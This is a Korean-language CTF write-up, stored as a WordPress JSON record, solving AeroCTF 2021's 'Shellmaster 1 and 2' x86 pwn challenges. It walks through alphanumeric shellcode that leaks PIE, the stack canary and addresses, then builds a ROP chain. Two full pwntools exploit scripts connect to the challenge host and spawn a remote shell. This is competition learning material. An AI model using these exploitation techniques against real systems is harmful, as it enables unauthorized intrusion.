{"id":903,"date":"2021-03-04T02:10:05","date_gmt":"2021-03-03T17:10:05","guid":{"rendered":"http:\/\/ipwn.kr\/?p=903"},"modified":"2021-03-04T02:51:05","modified_gmt":"2021-03-03T17:51:05","slug":"aeroctf-2021-shell-master1-2","status":"publish","type":"post","link":"http:\/\/ipwn.kr\/index.php\/2021\/03\/04\/aeroctf-2021-shell-master1-2\/","title":{"rendered":"[AEROCTF 2021] shell master1, 2"},"content":{"rendered":"

Shellmaster 1, 2<\/h1>\n
\n

\ub458 \ub2e4 \uae30\ubcf8\uc801\uc73c\ub85c alphanumeric shellcode<\/code>(\uc774\uac8c \uc2e4\uc81c\ub85c \uc4f8\ubaa8\uac00 \uc788\ub098\ub294 \ubaa8\ub974\uaca0\uc9c0\ub9cc..)\ub97c \uc791\uc131\ud558\ub294 \ub2a5\ub825\uc774 \uc788\ub294\uc9c0\uc5d0 \ub300\ud574 \ubb3b\ub294 \ubb38\uc81c\uc600\ub2e4.
\n\ubb38\uc81c\ub294 \ub458 \ub2e4 x86\ud658\uacbd\uc774\uc5c8\uace0 alphanumeric \ubc94\uc704\uc5d0\uc11c \uc758\uc678\ub85c \uc4f8\ub9cc\ud55c instruction\uc774 \ub9ce\uc544\uc11c \ud06c\uac8c \uc5b4\ub824\uc6b4 \uc810\uc740 \uc798 \uc5c6\ub2e4\uace0 \ub290\uaef4\uc9c8 \uc218\ub3c4 \uc788\ub2e4.
\n\ub450 \ubb38\uc81c\ub294 \uac70\uc758 \ub611\uac19\uc740\ub370 \uc57d\uac04\uc758 \ucc28\uc774\uc810\uc774 \uc788\ub2e4. \uc774 \uc810\uc5d0 \ub300\ud574\uc11c\ub294 \ubb38\uc81c\uc5d0 \ub300\ud574 \uc11c\uc220\ud558\uba74\uc11c \ucd94\uac00\ub85c \uc801\ub3c4\ub85d \ud558\uaca0\ub2e4.<\/p>\n

Shellmaster1<\/h1>\n
\n

Mitigation<\/h2>\n
\n
    \n
  • Relro : Full Rerlo<\/span><\/li>\n
  • Stack : canary found<\/span><\/li>\n
  • NX : NX enable<\/span><\/li>\n
  • PIE : PIE enable<\/span><\/li>\n<\/ul>\n

    \ud480 \ubbf8\ud2f0\uac8c\uc774\uc158\uc774 \uac78\ub824\uc788\ub294\ub370 \uc758\uc678\ub85c \uae4c\ub2e4\ub85c\uc6b4 \uc810\uc740 \ub9ce\uc774 \uc5c6\ub2e4.<\/p>\n

    Analyzing<\/h2>\n
    \n

    \ubd84\uc11d\uc5d0 \ud070 \uc5b4\ub824\uc6c0\uc740 \uc5c6\ub2e4.<\/p>\n

    Intro<\/h3>\n

    \ud544\uc694\uc5c6\ub294 \ubd80\ubd84\uc758 \ucf54\ub4dc\ub4e4\uc740 \uc0dd\ub7b5\ud558\uaca0\ub2e4. \uba54\ub274\ub294 add shellcode, delete shellcode, view shellcode, run shellcode<\/code> \ucd1d 4\uac1c\uc758 \uba54\ub274\uac00 \uc874\uc7ac\ud558\uace0 main<\/code>\ud568\uc218\uc5d0\uc11c\ub294 \uc6d0\ud558\ub294 \uae30\ub2a5\uc744 \uc2e4\ud589\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n

    add_shellcode<\/h3>\n
    void __cdecl add_shellcode()\n{\n  ssize_t v0; \/\/ [esp+Ch] [ebp-1Ch]\n  ssize_t i; \/\/ [esp+10h] [ebp-18h]\n  int v2; \/\/ [esp+14h] [ebp-14h]\n  int j; \/\/ [esp+18h] [ebp-10h]\n  char *s; \/\/ [esp+1Ch] [ebp-Ch]\n\n  printf(\"{?} Enter shellcode: \");\n  s = malloc(6u);\n  memset(s, 0, 6u);\n  v0 = read(0, s, 6u);\n  if ( s[v0 - 1] == 10 )\n    s[--v0] = 0;\n  for ( i = 0; i < v0; ++i )\n  {\n    if ( ((*__ctype_b_loc())[s[i]] & 0x400) == 0 && ((*__ctype_b_loc())[s[i]] & 0x800) == 0 )\n    {\n      puts(\"{-} Invalid shellcode!\");\n      free(s);\n      return;\n    }\n  }\n  v2 = 0;\n  for ( j = 0; j <= 1; ++j )\n  {\n    if ( !shellcodes[j] )\n    {\n      shellcodes[j] = s;\n      v2 = 1;\n      break;\n    }\n  }\n  if ( !v2 )\n  {\n    puts(\"{-} No free space!\");\n    free(s);\n  }\n}\n<\/code><\/pre>\n
    add\ud568\uc218\uc5d0\uc11c\ub294 char *shellcodes[2]<\/code>\ub77c\ub294 \uc804\uc5ed\ubcc0\uc218\uc5d0 shellcode\ub97c 6\ubc14\uc774\ud2b8\ub9cc\ud07c \uc785\ub825\ubc1b\uace0 \uc778\ub371\uc2a4\uc5d0 \uc54c\ub9de\ub294 \uc704\uce58\uc5d0 \uc0bd\uc785\ud55c\ub2e4. \uadfc\ub370 \uc5ec\uae30\uc11c ascii\ubc94\uc704\uac00 \uc544\ub2c8\uac70\ub098 \ud2b9\uc218\ubb38\uc790\uc778 \uacbd\uc6b0\uc5d0\ub294 \uc911\uac04\uc5d0 shellcode\ub97c \uc0ad\uc81c\uc2dc\ucf1c\ubc84\ub9ac\uae30 \ub54c\ubb38\uc5d0 \ubb34\uc870\uac74 alphanumeric\ubc94\uc704 \ub0b4\uc5d0\uc11c \uc791\uc131\ud574\uc57c\ub9cc \ud55c\ub2e4.<\/p>\n
    run_shellcode<\/h3>\n
    void __cdecl run_shellcode()\n{\n  int v0; \/\/ [esp+4h] [ebp-24h] BYREF\n  unsigned int v1; \/\/ [esp+8h] [ebp-20h]\n  char *v2; \/\/ [esp+Ch] [ebp-1Ch]\n  __int64 v3; \/\/ [esp+10h] [ebp-18h]\n  unsigned int v4; \/\/ [esp+1Ch] [ebp-Ch]\n\n  v4 = __readgsdword(0x14u);\n  if ( limit == 2 )\n  {\n    puts(\"{-} You have no more attempts!\");\n  }\n  else\n  {\n    ++limit;\n    printf(\"{?} Enter idx: \");\n    v1 = read_int();\n    if ( v1 <= 2 )\n    {\n      if ( shellcodes[v1] )\n      {\n        printf(\"{?} Enter shellcode argument: \");\n        __isoc99_scanf(\"%ul\", &v0);\n        memset(addr, 0, 6u);\n        memcpy(addr, shellcodes[v1], 6u);\n        addr[6] = '\\x90';\n        addr[7] = '\\xC3';\n        v2 = addr;\n        v3 = (addr)(v0);\n        printf(\"{!} Shellcode return code = %lld\\n\", v3);\n      }\n      else\n      {\n        puts(\"{-} No such shellcode!\");\n      }\n    }\n    else\n    {\n      puts(\"{-} Incorrect idx!\");\n    }\n  }\n}\n<\/code><\/pre>\n
    run \ud568\uc218\uc5d0\uc11c\ub294 \uadf8\ub0e5 \uc778\ub371\uc2a4\uc5d0 \uc54c\ub9de\ub294 shellcode\ub97c \uc2e4\ud589\uc2dc\ucf1c\uc8fc\ub294\ub370, \uc258\ucf54\ub4dc\uc758 \ub9e8 \ub9c8\uc9c0\ub9c9\uc5d0 ret<\/code> instruction\uc744 \ucd94\uac00\ud55c \ud6c4\uc5d0 call\ud574\uc8fc\uba74\uc11c \uc6d0\ub798\uc758 \uc704\uce58\uc5d0 \ub3cc\uc544\uc62c \uc218 \uc788\ub3c4\ub85d \ub9cc\ub4e0\ub2e4. \ub610, shellcode\uc5d0 \uc778\uc790\ub97c \uc2a4\ud0dd\uc5d0 push\ud560 \uc218 \uc788\ub3c4\ub85d \ud574\uc900\ub2e4.
    \nshellcode\uac00 \ubaa8\ub450 \uc2e4\ud589\ub41c \ud6c4\uc5d0\ub294 eax<\/code>\uac12\uc744 printf\ub85c \ucd9c\ub825\ud574\uc900\ub2e4.<\/p>\n
    delete<\/code>\ub791 view<\/code> \ud568\uc218\ub294 \uadf8\ub0e5 \uc774\ub984\ucc98\ub7fc \uac01\uc790 \uc5ed\ud560\uc5d0 \ub9de\uac8c \uc778\ub371\uc2a4\uc5d0 \uc54c\ub9de\ub294 shellcode\ub4e4\uc744 \uc0ad\uc81c\ud55c\ub2e4. \ub531\ud788 \ubcfc \uac74 \uc5c6\uc5b4\uc11c \ucf54\ub4dc\ub294 \uc0dd\ub7b5\ud558\uaca0\ub2e4.<\/p>\n
    Exploit<\/h2>\n
    \n
    \uc5ec\uae30\uc11c exploit\uc744 \uc704\ud574\uc11c \uce90\uce58\ud574\uc57c \ud558\ub294 \uc810\uc774 \uba87 \uac00\uc9c0 \uc788\ub294\ub370 shellcode\uc758 \ub9e8 \ub9c8\uc9c0\ub9c9\uc5d0 ret\uc744 \ucd94\uac00\ud55c\ub2e4\ub294 \uc810\uacfc shellcode\uc758 \uc778\uc790\ub97c 1\uac1c \ub123\uc5b4\uc904 \uc218 \uc788\ub2e4\ub294 \uc810, \uadf8\ub9ac\uace0 eax\uac12\uc744 printf\ub85c \ucd9c\ub825\ud574\uc900\ub2e4\ub294 \uc810\uc774\ub2e4.
    \n\uadf8\ub7fc \uadf8\ub0e5 \uc774\uc81c\ub294 exploit\uc744 \ud558\uba74 \ub41c\ub2e4.
    \n\uadfc\ub370 \uadf8\ub0e5 epxloit\ud558\uae30\uc5d0\ub294 \uc870\uae08 \ube61\uc13c\uac8c, run shellcode\uc758 limit\uac00 2\ubc88\uc774\uae30 \ub54c\ubb38\uc5d0 \uc774 \ubd80\ubd84\uc744 \uc6b0\ud68c\ud574\uc57c \ud55c\ub2e4.
    \n\uc774 \ubd80\ubd84\uac19\uc740 \uacbd\uc6b0\uc5d0\ub294 \uba3c\uc800 pie\ub97c leak\ud574\uc57c \ud55c\ub2e4. pie\ub97c leak \ud55c \ud6c4\uc5d0 limit++<\/code>\uc744 \uc9c4\ud589\ud558\ub294 line\uc744 \ud55c \ubc88 \ub354 \uc2e4\ud589\uc2dc\ucf1c\uc11c \uac80\uc99d\uc744 \uc6b0\ud68c\ud560 \uac83\uc774\ub2e4.<\/p>\n
    How to leak pie and bypass the limit?<\/h3>\n
    \ubc29\ubc95\uc740 \uac04\ub2e8\ud558\ub2e4. \uc77c\ub2e8 32bit\uc758 \uacbd\uc6b0\uc5d0\ub294 ebx\uc5d0 got\uc601\uc5ed\uc758 \uac12\uc774 \uc4f0\uc5ec\uc788\uae30 \ub54c\ubb38\uc5d0 push ebx; pop eax; inc edx; inc edx; ...<\/code>\uc758 \ud615\ud0dc\ub85c eax\uc758 \uac12\uc744 code\uc601\uc5ed\uc73c\ub85c \uc62e\uaca8\uc8fc\uba74 pie\uac00 leak\uc774 \ub41c\ub2e4.
    \n\uadf8 \uc774\ud6c4\uc5d0\ub294 \uc544\uae4c \uc778\uc790\ub97c push<\/code>\ud574\uc8fc\ub294 \uc810\uc744 \uc774\uc6a9\ud574\uc11c limit++<\/code>\uc744 \uc9c4\ud589\ud558\ub294 line\uc73c\ub85c return\ud558\uac8c \ub9cc\ub4e4\uc5b4\uc900\ub2e4. \uadf8\ub7fc limit<\/code>\uc804\uc5ed\ubcc0\uc218\uac00 3\uc774 \ub418\uba74\uc11c limit == 2<\/code>\ub97c \uac80\uc99d\ud558\ub294 \ubd80\ubd84\uc774 \uc6b0\ud68c\uac00 \ub41c\ub2e4.<\/p>\n
    \uadf8 \ub2e4\uc74c\uc740 \uc5ec\ub7ec\uac00\uc9c0 \ubc29\ubc95\uc73c\ub85c exploit\uc744 \uc9c4\ud589\ud560 \uc218 \uc788\uaca0\uc9c0\ub9cc, \ub098\uc758 \uacbd\uc6b0\uc5d0\ub294 read_int<\/code>\ud568\uc218\ub85c ret\uc744 \uc2dc\ucf1c\uc11c rop\ub97c \uc9c4\ud589\ud588\ub2e4. \uadfc\ub370 \uc774 \ubd80\ubd84\uc5d0\uc11c \ubb38\uc81c\uc810\uc774 \ubc14\ub85c canary<\/code>\uc774\ub2e4.<\/p>\n
    How to leak canary and ROP?<\/h3>\n
    \uc774 \uac83\ub3c4 \uc0ac\uc2e4 alphanumeric shellcode\ub97c \uc9dc\ubcf8 \uc0ac\ub78c\uc774 \uc788\ub2e4\uba74 \ud639\uc740 intel opcode\uc5d0 \ub300\ud574\uc11c \uacf5\ubd80\ud574\ubcf8 \uc0ac\ub78c\uc774 \uc788\ub2e4\uba74 \uc54c\uaca0\uc9c0\ub9cc \uc758\uc678\ub85c xor eax, [ecx + 0x30]<\/code>\uac19\uc740 \uc258 \ucf54\ub4dc\uac00 alphanumeric\uc774\ub77c\ub294 \uac78 \uc54c \uc218 \uc788\ub2e4. \uac8c\ub2e4\uac00 \uaca8\uc6b0 3\ubc14\uc774\ud2b8\ubc16\uc5d0 \uc548 \ud55c\ub2e4.
    \n\uadfc\ub370 shellcode\ub97c \ud638\ucd9c\ud560 \ub54c\ub97c \ubcf4\uba74 call eax<\/code>\uc758 \ud615\uc2dd\uc73c\ub85c \ud638\ucd9c\ud558\uace0 \uc774\ub9d0\uc740 \uc989 shellcode\uc758 \uc8fc\uc18c\ub294 leak\uc744 \ud560 \uc218 \uc788\ub2e4\ub294 \ub9d0\uc774 \ub41c\ub2e4. \uc2ec\uc9c0\uc5b4 push esp; pop ecx;<\/code>\uac19\uc740 \uc5b4\uc148\ube14\ub9ac\ub3c4 \uc0ac\uc6a9\uc774 \uac00\ub2a5\ud558\ub2e4.
    \n\uc774\ub7f0 \uc810\ub4e4\uc744 \uc774\uc6a9\ud558\uba74 stack\uc5d0 \uc874\uc7ac\ud558\ub294 canary\uc758 \uac12\uacfc shellcode\uc758 \uc2dc\uc791\uc8fc\uc18c\ub97c xor<\/code>\uc2dc\ucf1c\uc11c leak<\/code>\ud560 \uc218 \uc788\uace0, shellcode\uc758 \uc8fc\uc18c\ub97c \uc774\ubbf8 leak\ud588\ub2e4\uba74 shellcode\uc758 \uc8fc\uc18c\uac12\uacfc leak<\/code>\ub41c \uac12\uc744 xor<\/code>\ud588\uc744 \ub54c canary<\/code>\uc758 \uac12\uc744 leak<\/code>\ud560 \uc218 \uc788\ub2e4\ub294 \uac83\ub3c4 \uc54c \uc218 \uc788\uc744 \uac83\uc774\ub2e4.
    \n\uc774\ud6c4\ub294 \uac04\ub2e8\ud558\ub2e4. shellcode\uc758 \uc778\uc790\ub97c \ucd94\uac00\ud560 \uc218 \uc788\uc73c\ub2c8 read_int<\/code> \ud568\uc218\uc5d0\uc11c read\ud568\uc218\uc758 \uc785\ub825 size\ub97c push\ud55c \uc774\ud6c4\uc758 \uc601\uc5ed(\uc774\ud558 read_int<\/code> \uac00\uc82f)\uc73c\ub85c ret\uc2dc\ud0ac \uc218 \uc788\uace0, \uc774 \ub9d0\uc740 \uc989 read(0, stack, our_input)<\/code>\uc758 \ud615\uc2dd\uc73c\ub85c read\ud568\uc218\ub97c \ud638\ucd9c\ud558\uc5ec ROP\ub97c \uc9c4\ud589\ud560 \uc218 \uc788\ub2e4\ub294 \ub9d0\uc774 \ub41c\ub2e4.
    \n\uc774\ub7f0 \uc544\uc774\ub514\uc5b4\ub97c \uac16\uace0 exploit\uc744 \uc9c4\ud589\ud558\uba74 \ub41c\ub2f9.<\/p>\n
    solve.py<\/h4>\n
    from pwn import *\n\ne = ELF('.\/shmstr')\n#p = process(e.path, aslr=False)\np = remote('151.236.114.211', 17173)\npppr = 0x000019d0\nread = 0x1130\n\nsla = p.sendlineafter\nsa = p.sendafter\n\ndef add(buf):\n    sla('>', '1')\n    sa(': ', buf)\n\ndef delete(idx):\n    sla('>', '3')\n    sa(': ', str(idx))\n\ndef run(idx, arg):\n    sla('>', '4')\n    sla(': ', str(idx))\n    sla(': ', str(arg))\n\nadd(\"\\x58\\x50\\x50\\x50\\x58\\x58\")\nrun(0, 0)\n\np.recvuntil(\"= \")\npie = (int(p.recvline()) & 0xffffffff) - 0x1841\npppr += pie\nread += pie\ne.address = pie\nlog.info('[PIE] 0x%x'%pie)\n\nadd(\"\\x58\\x59\\x51\\x50\\x58\\x51\")\nrun(1, pie + 0x1734)\nsla(': ', '0')\nsla(': ', '0')\n\ndelete(0)\ndelete(1)\n\nbuf = asm(\"push esp; pop eax; push eax; pop eax; push eax; pop eax\")\nadd(buf)\nrun(0, 0)\n\np.recvuntil('code = ')\nstack = (int(p.recvline()) & 0xffffffff)\nlog.info(\"[STACK] 0x%x\"%stack)\n\nbuf = asm(\"push eax; pop eax; push eax; pop eax; push eax; pop eax\")\nadd(buf)\nrun(1, 0)\n\np.recvuntil('code = ')\nshellcode = (int(p.recvline()) & 0xffffffff)\nlog.info(\"[SHELLCODE] 0x%x\"%shellcode)\n\ndelete(0)\ndelete(1)\n\nbuf = asm(\"push esp; pop ecx; xor eax, [ecx + 0x30]; inc edx\")\nadd(buf)\nrun(0, 0)\n\np.recvuntil('code = ')\ncanary = ((int(p.recvline()) ^ shellcode) & 0xffffffff)\nlog.info(\"[CANARY] 0x%x\"%canary)\n\nbuf = asm(\"pop edx; pop edx; pop ecx; push eax; push edx; inc edx;\")\nadd(buf)\nrun(1, pie + 0x191F)\n\nrop = 'A'*0x8 + p32(canary) + 'A'*0x4 + p32(pie + 0x3f9c) + 'A'*4\nrop += p32(read) + p32(pppr) + p32(0) + p32(shellcode) + p32(0x2000)\nrop += p32(shellcode)*2\n\np.send(rop)\nsleep(5)\np.send('\\x90'*0x100 + asm(shellcraft.sh()) + '\\x90'*0x100)\n\np.interactive()\n<\/code><\/pre>\n
    Shellmaster2<\/h1>\n
    \n
    Mitigation<\/h2>\n
    \n
      \n
    • Relro   : Full Rerlo<\/span><\/li>\n
    • Stack   : canary found<\/span><\/li>\n
    • NX  : NX enable<\/span><\/li>\n
    • PIE : PIE enable<\/span><\/li>\n<\/ul>\n
      1\ubc88 \ubb38\uc81c\uc640 \uac19\uc774 \ud480 \ubbf8\ud2f0\uac8c\uc774\uc158\uc774\ub2e4.<\/p>\n
      Analyzing<\/h2>\n
      \n
      \ubd84\uc11d\ud560 \uac74 \ub531\ud788 \uc5c6\ub2e4. 1\ubc88\ubb38\uc81c\ub791 \ub2e4\ub978 \uc810\uc740 add_shellcode<\/code>\ud568\uc218\uc5d0\uc11c shellcode\uc758 \ud06c\uae30\ub97c 16byte\ub85c \ub298\ub824\uc92c\ub2e4\ub294 \uc810\uacfc run_shellcoed<\/code>\uc758 limit\uc774 6\ubc88\uc73c\ub85c \ub298\uc5b4\ub0ac\ub2e4\ub294 \uc810, \uadf8\ub9ac\uace0 \uc778\uc790\ub97c \ub118\uaca8\uc904 \uc218 \uc5c6\ub2e4\ub294 \uc810\uc774\ub2e4.<\/p>\n
      Exploit<\/h2>\n
      \n
      \uc774\uac8c \ub354 \uc26c\uc6cc\uc9c4 \uac70 \uc544\ub2cc\uac00? \ub77c\uace0 \uc0dd\uac01\ud560 \uc218 \uc788\ub294\ub370 alphanumeric \ubc94\uc704\ub97c \ucd08\uacfc\ud558\ub294 \uac12<\/code>\uc744 \uc2a4\ud0dd\uc5d0 \ub9c8\uc74c\ub300\ub85c \uc313\uc744 \uc218 \uc788\ub3c4\ub85d \uc778\uc790\ub97c \ub123\uc5b4\uc8fc\ub294 \ubd80\ubd84\uc774 \uc0ac\ub77c\uc9c4 \uac74 \uaf64 \ud070 \ud0c0\uaca9\uc774\ub2e4.
      \n\uadf8\ub798\uc11c xor<\/code>, push<\/code> \ub4f1\uc758 instruction\ub4e4\uc744 \uc774\uc6a9\ud574\uc11c read_int<\/code> \uac00\uc82f\uc744 \ud638\ucd9c\ud574\uc57c\ud55c\ub2e4.
      \n\uc77c\ub2e8 6\ubc88\uc774\ub77c\ub294 \uaf64 \ub9ce\uc740 \ud69f\uc218\ub85c \uc258\ucf54\ub4dc\ub97c \ud638\ucd9c \ud560 \uc218 \uc788\uae30 \ub54c\ubb38\uc5d0 pie, shellcode, canary<\/code>\ub294 \uae08\ubc29 leak\ud560 \uc218 \uc788\uc744 \uac83\uc774\ub2e4. \uadfc\ub370 6\ubc88\ub3c4 \uc740\uadfc\ud788 \uc801\uc740 \ud69f\uc218\uc774\uae30 \ub54c\ubb38\uc5d0 \ub298\uc5b4\ub09c 16byte\ub77c\ub294 shellcode\uc758 \ud06c\uae30\ub97c \uc774\uc6a9\ud574 \ud55c \ubc88\uc5d0 \ub450 \uac00\uc9c0\uc758 \uc791\uc5c5\uc744 \ub3d9\uc2dc\uc5d0 \uc9c4\ud589\ud574\uc57c\ud55c\ub2e4.
      \n\uc77c\ub2e8 stack\uc5d0\ub294 [esp + alphanumeric range value]<\/code>\uc758 \uc601\uc5ed\uc5d0 \ud568\uc218\uac00 \uacc4\uc18d \uc9c4\ud589\ub418\ub3c4 \ubcc0\ud615\ub418\uc9c0 \uc54a\uc73c\uba74\uc11c \ub3d9\uc2dc\uc5d0 0\uc774\ub77c\ub294 \uac12\uc744 \uac16\ub294 \uc601\uc5ed\uc774 \uc874\uc7ac\ud558\uae30\uc5d0 xor<\/code>\uc744 \ud1b5\ud574 \uc6d0\ud558\ub294 \uac12\uc73c\ub85c \ub9cc\ub4e4\uc5b4\uc904 \uc218 \uc788\ub2e4.
      \n\ud558\uc9c0\ub9cc read_int<\/code> \uac00\uc82f\uc758 \uc0c1\uc704 3\ubc14\uc774\ud2b8\ub294 \ubab0\ub77c\ub3c4 \uac00\uc7a5 \ucd5c\ud558\uc704 1\ubc14\uc774\ud2b8\ub294 0xa2<\/code>\ub85c \ud56d\uc0c1 alphanumeric\ud558\uc9c0 \uc54a\uc740 \uac12\uc774\ub2e4. \uc989 \uc774 \ubd80\ubd84\uc744 xor\uc744 \ud1b5\ud574\uc11c \ub9de\ucdb0\uc918\uc57c \ud558\ub294\ub370, 0xa2<\/code>\ub294 alphanumeric \ubc94\uc704\uc758 \uc5b4\ub5a4 \uac12\ub4e4\uc744 \ud1b5\ud574 \uc11c\ub85c xor\uc744 \ud574\ub3c4 \ub9de\ucdb0\uc8fc\uae30 \uc5b4\ub835\ub2e4.<\/p>\n
      How to make read_int gadget?<\/h3>\n
      \uadf8\ub798\uc11c \ub0b4\uac00 \ucc3e\uc544\ub0b8 \uac12\uc740 0xfb ^ 0x59 == 0xa2<\/code> \uc600\ub2e4… ^^.. \uc774 \uac12\uc5d0 \uc54c\ub9de\uac8c \uc77c\ub2e8 read_int<\/code>\uac00\uc82f\uc758 \ud558\uc704 1\ubc14\uc774\ud2b8\ub97c 0x59\ub85c \ub9de\ucdb0\uc900 \ud6c4 stack\uc5d0 xor\ud574\uc11c \uc0bd\uc785\ud588\ub2e4.
      \n\uc774\uac74 \ubaa8\ub450 push 0x41414141<\/code>\uac19\uc740 instruction\uc774 alphanumeric\uc774\ub77c \uac00\ub2a5\ud55c \uc774\uc57c\uae30 \u314e\u314e
      \n\uadf8 \uc774\ud6c4\uc5d0\ub294 stack\uc758 \uc5b4\ub5a4 \ud55c \ubd80\ubd84\uc5d0 0\ud639\uc740 \uadf8\uc5d0 \uac00\uae4c\uc6b4 \uac12\uc774 \uc788\ub294\ub370, \uadf8 \uac12\uacfc dec reg<\/code>\ub77c\ub294 \uc5b4\uc148\ube14\ub9ac\ub97c \ud1b5\ud574\uc11c 0xffffffff<\/code>\uc774\ub77c\ub294 \uac12\uc744 \ub9cc\ub4e4\uc5c8\uace0 \uc774 \uac12\uc758 \uac00\uc7a5 \uc0c1\uc704 1\ubc14\uc774\ud2b8\ub9cc \uc2a4\ud0dd\uc5d0 \uae30\ub85d\ud558\uc5ec 0xff<\/code>\ub77c\ub294 \uac12\ub3c4 \ub9cc\ub4e4\uc5c8\ub2e4.
      \n\uadf8 \uc774\ud6c4 \uadf8 \uac12\uc744 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud574 dec reg<\/code>\uc640 \ud568\uaed8 0xfb<\/code>\ub97c \ub9cc\ub4e4\uc5c8\uace0, \uc774 \uac12\uc744 \ud1b5\ud574\uc11c xor\uc744 \uc9c4\ud589\ud558\uba74 \uc774\uc81c stack\uc5d0 read_int<\/code> \uac00\uc82f\uc774 \uc874\uc7ac\ud558\uac8c \ub41c\ub2e4. ^^…, \uc2ec\uc9c0\uc5b4 \uc0c1\uc704 3\ubc14\uc774\ud2b8 \uc911 0.5byte\uc815\ub3c4\ub294 \ube0c\ud3ec\ub97c \uc9c4\ud589\ud574\uc57c \ud55c\ub2e4…
      \n\ubb50 \uc5ec\ud2bc \uc774\ub7f0 \ubc29\uc2dd\uc744 \ud1b5\ud574 read_int<\/code>\uac00\uc82f\uc744 \ud638\ucd9c\ud560 \uc218 \uc788\uace0 \uadf8 \uc774\ud6c4\ub294 \uadf8\ub0e5 \ub611\uac19\uc774 rop\ub97c \ud1b5\ud574 execve(\/bin\/sh)<\/code> shellcode\ub97c \uc2e4\ud589\uc2dc\ud0a4\uba74 \ub41c\ub2e4.<\/p>\n
      \uacc4\uc18d \uc801\ub2e4\ubcf4\ub2c8\uae4c \uae38\uc5b4\uc9c0\uace0 \uc801\uae30\ub3c4 \uadc0\ucc2e\uc544\uc9c0\uace0 \ud574\uc11c \ud6c4\ubc18\ubd80\uc5d0\ub294 \ub300\ucda9 \uc801\uc5c8\uc74c.<\/p>\n
      \uadfc\ub370 \uc4f0\uba74\uc11c \uae68\uc6b0\uce5c \uac74\ub370 \uac4d read_int<\/code> \uac00\uc82f \ud558\uc704 1\ubc14\uc774\ud2b8\ub97c 0\uc73c\ub85c \ub123\uace0 \uadf8 \uc0c1\ud0dc\uc5d0\uc11c decrease\ub97c \uc9c4\ud589\ud588\uc73c\uba74 0xfb<\/code>\ub97c \ub9cc\ub4e4\uc5b4\ub0b4\ub294 \uc791\uc5c5\uc744 \ud558\ub098 \ub354 \uc904\uc5ec\ubcfc \uc218 \uc788\uc5c8\uaca0\ub2e4\ub294 \uc0dd\uac01\uc774 \ub4e0\ub2e4.<\/p>\n
      push read_int<\/code> 5\ubc14\uc774\ud2b8 pop reg<\/code> 1\ubc14\uc774\ud2b8
      \npush esp ; pop reg<\/code> 2\ubc14\uc774\ud2b8 dec reg<\/code> 1\ubc14\uc774\ud2b8 * 5
      \nxor [stack], reg<\/code> 3\ubc14\uc774\ud2b8
      \n\ub531 16\ubc14\uc774\ud2b8…, \u314e\u314e \uc774\uac78 \uc65c \uc0dd\uac01 \ubabb\ud588\uc744\uae4c… \u314e\u314e<\/p>\n
      \ud480\uc5c8\uc73c\ub2c8 \ub410\uc9c0 \ubb50..,<\/p>\n
      solve.py<\/h4>\n
      from pwn import *\nimport string\n\ne = ELF('.\/shmstr2')\n\ntable = string.printable[:62]\n\ndef add(buf):\n    sla('>', '1')\n    sa(': ', buf)\n\ndef delete(idx):\n    sla('>', '3')\n    sa(': ', str(idx))\n\ndef run(idx):\n    sla('>', '4')\n    sla(': ', str(idx))\n\ndef main(p):\n    pppr = 0x00001961\n    read = 0x1120\n    target = 0x18A2\n\n    buf = asm(\"push ebx; pop eax;\") + asm(\"inc edx\")*0xe\n    add(buf)\n    run(0)\n\n    p.recvuntil(\"= \")\n    pie = (int(p.recvline(), 16) & 0xffffffff) - 0x3fa0\n\n    pppr += pie\n    read += pie\n    target += pie\n\n    for i in range(3):\n        check = False\n        for c in table:\n            if chr(target >> (8*(3 - i)) & 0xff) is c:\n                check = True\n        if check is False:\n            log.info(\"0x%x!!!!\"%(target >> (8*(3 - i)) & 0xff))\n            log.info(\"0x%x is not exploitable\"%target)\n            p.close()\n            return True\n\n    e.address = pie\n    log.info('[PIE] 0x%x'%pie)\n\n    val = (target & 0xffffff00) + 0x59\n    buf = asm(\"push esp; pop ecx; push 0x%x; pop edx; xor DWORD PTR [ecx + 0x38], edx; pop edx;\"%val)\n    buf += asm(\"push edx;\")*4\n    add(buf)\n    run(1)\n\n    p.recvuntil(\"= \")\n    shellcode = (int(p.recvline(), 16) & 0xffffffff)\n    log.info('[SHELLCODE] 0x%x'%shellcode)\n\n    delete(0)\n    delete(1)\n\n    buf = asm(\"pop edx;\")\n    buf += asm(\"push esp;\")*10\n    buf += asm(\"pop ecx; xor eax, [ecx + 0x30]; push edx\")\n    add(buf)\n    run(0)\n\n    p.recvuntil('code = ')\n    canary = ((int(p.recvline(), 16) ^ shellcode) & 0xffffffff)\n    log.info(\"[CANARY] 0x%x\"%canary)\n\n    buf = asm(\"push esp; pop ecx; pop eax; pop edx;\")\n    buf += asm(\"dec edx;\")*8\n    buf += asm(\"xor [ecx + 0x49], edx; push eax;\")\n    add(buf)\n    run(1)\n\n    delete(0)\n    delete(1)\n\n    buf = asm(\"push esp; pop ecx; pop eax; pop edx; pop edx; xor edx, [ecx + 0x4c];\")\n    buf += asm(\"dec edx\")*4\n    buf += asm(\"xor [ecx + 0x38], edx; push eax;\")\n    add(buf)\n    run(0)\n\n    buf = asm(\"push esp; pop ecx; pop eax; pop edx; pop edx; dec edx; xor edx, [ecx + 0x38]; push 0x41414141; push edx; inc edx;\")\n    add(buf)\n    run(1)\n\n    rop = 'A'*0x8 + p32(canary) + 'A'*0x4 + p32(pie + 0x3fa0) + 'A'*0x4\n    rop += p32(read) + p32(shellcode) + p32(0) + p32(shellcode) + p32(0x1000)\n\n    p.send(rop)\n    sleep(5)\n    p.send(\"\\x90\"*0x100 + asm(shellcraft.sh()) + \"\\x90\"*0x100)\n    p.interactive()\n    return False\n\nif __name__ == \"__main__\":\n    global sla, sa\n    result = True\n    while result:\n        #p = process(e.path)\n        p = remote('151.236.114.211', 17183)\n        sla = p.sendlineafter\n        sa = p.sendafter\n        result = main(p)\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
